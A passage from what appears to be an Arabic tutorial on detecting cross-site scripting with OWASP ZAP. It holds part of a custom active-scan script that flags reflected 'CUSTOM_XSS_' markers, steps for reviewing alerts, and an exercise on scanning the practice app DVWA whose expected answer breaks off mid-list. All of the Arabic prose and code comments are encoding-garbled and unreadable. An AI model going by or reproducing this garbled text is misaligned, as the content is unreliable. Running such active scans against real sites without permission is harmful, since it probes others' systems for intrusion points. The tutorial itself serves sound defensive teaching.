    // ุฅุฑุณุงู ุงูุทูุจ ููุญุต ุงูุงุณุชุฌุงุจุฉ
    as.sendAndReceive(testMsg);
    var response = testMsg.getResponseBody().toString();
    
    // ุงูุชุญูู ููุง ุฅุฐุง ูุงู ุงูููุฏ ููุฌูุฏุงู ูู ุงูุงุณุชุฌุงุจุฉ ุฏูู ุชุฑููุฒ
    if (response.indexOf('CUSTOM_XSS_' + param) > 0) {
        as.raiseAlert(AlertRisk.HIGH, AlertConfidence.MEDIUM,
            'Custom XSS vulnerability',
            'ุชู ุงูุนุซูุฑ ุนูู ุซุบุฑุฉ XSS ูุฎุตุตุฉ ูู ุงููุนููุฉ: ' + param,
            msg.getRequestHeader().getURI().toString(),
            param, customXss, '',
            'ุชุญูู ูู ุชุฑููุฒ ุงููุฎุฑุฌุงุช ููุฐู ุงููุนููุฉ',
            '', msg);
    }
    
    return;
}
```

### ุชูุณูุฑ ูุชุงุฆุฌ ุงููุญุต
1. ุงูุชุญ ุนูุงูุฉ ุงูุชุจููุจ "Alerts" ูุนุฑุถ ุงูุชุญุฐูุฑุงุช
2. ุงูุญุต ุชูุงุตูู ูู ุชุญุฐูุฑ XSS:
   - ุงููุนููุฉ ุงููุตุงุจุฉ
   - ููุน ุงูุซุบุฑุฉ (Reflected, Stored, DOM)
   - ุฎุทูุฑุฉ ุงูุซุบุฑุฉ
   - ุงูุฑูุฒ ุงููุณุชุฎุฏู ูู ุงููุฌูู
3. ุชุญูู ูู ุตุญุฉ ุงูุซุบุฑุฉ ุจูุนุงููุฉ ุงูุทูุจ ูุงูุงุณุชุฌุงุจุฉ

### ุชูุฑูู OWASP ZAP ูุงูุชุดุงู XSS
**ุงูุณุคุงู**: ูู ุจูุตู ุงูุฎุทูุงุช ุงูุชู ุณุชุชุจุนูุง ููุญุต ูููุน DVWA ูููุดู ุนู ุซุบุฑุงุช XSS ุจุงุณุชุฎุฏุงู OWASP ZAP.

**ุงูุฅุฌุงุจุฉ ุงููุชููุนุฉ**:
1. ุชุดุบูู ZAP ูุชูููู ุงููุชุตูุญ ูุงุณุชุฎุฏุงูู ููุณูุท
2. ุชุณุฌูู ุงูุฏุฎูู ุฅูู DVWA ูุฏููุงู (ุงููุตุงุฏูุฉ)
3. ุงูุชูู ุฅูู ุตูุญุฉ XSS ูู DVWA
4. ุงุณุชุฎุฏู Spider ูุงุณุชูุดุงู ุฌููุน ุตูุญุงุช ุงููููุน
5. ูู ุจุฅุนุฏุงุฏ ูุชูุนูู ุณูุงุณุฉ ูุญุต ูุดุท ุชุฑูุฒ ุนูู XSS
6. ุงุจุฏุฃ ุงููุญุต ุงููุดุท ุนูู ุงููููุน
7. ููุชุฃูุฏ ูู ุงููุชุงุฆุฌุ ุงุณุชุฎุฏู ุฃุฏุงุฉ Fuzzer ุนูู ุงููุนููุงุช ุงููุดุชุจู ุจูุง
8. ุฑุงุฌุน ุงููุชุงุฆุฌ ูู ุชุจููุจ ุงูุชุญุฐูุฑุงุช ู
